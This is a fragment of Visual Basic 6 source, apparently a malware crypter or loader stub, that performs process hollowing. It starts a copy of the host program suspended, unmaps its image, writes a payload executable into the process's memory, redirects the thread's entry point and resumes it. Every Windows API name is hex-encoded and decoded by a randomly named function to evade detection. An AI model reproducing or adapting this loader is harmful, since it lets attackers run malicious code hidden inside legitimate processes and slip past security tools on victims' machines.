  1. 'kernel32
  2. lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332"))
  3.  
  4. 'ntdll
  5. lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C"))
  6.  
  7. If sHost = vbNullString Then
  8.     sHost = Space(260)
  9.  
  10.     'GetModuleFileNameW
  11.    lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557"))
  12.     Invoke lMod, App.hInstance, StrPtr(sHost), 260
  13. End If
  14.  
  15. With tIMAGE_NT_HEADERS.OptionalHeader
  16.  
  17.     tSTARTUPINFO.cb = Len(tSTARTUPINFO)
  18.  
  19.     'CreateProcessW
  20.    lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357"))
  21.     Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)
  22.  
  23.     'NtUnmapViewOfSection
  24.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E"))
  25.     Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
  26.  
  27.     'VirtualAllocEx
  28.    lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578"))
  29.     Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
  30.  
  31.     'NtWriteVirtualMemory
  32.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279"))
  33.     Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0
  34.  
  35.     For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
  36.         CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)
  37.         Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
  38.     Next i
  39.  
  40.     tCONTEXT.ContextFlags = CONTEXT_FULL
  41.  
  42.     'NtGetContextThread
  43.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164"))
  44.     Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
  45.  
  46.     'NtWriteVirtualMemory
  47.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279"))
  48.     Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
  49.  
  50.     tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
  51.  
  52.     'NtSetContextThread
  53.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164"))
  54.     Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
  55.  
  56.     'NtResumeThread
  57.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164"))
  58.     Invoke lMod, tPROCESS_INFORMATION.hThread, 0
  59.  
  60.     hProc = tPROCESS_INFORMATION.hProcess
  61. End With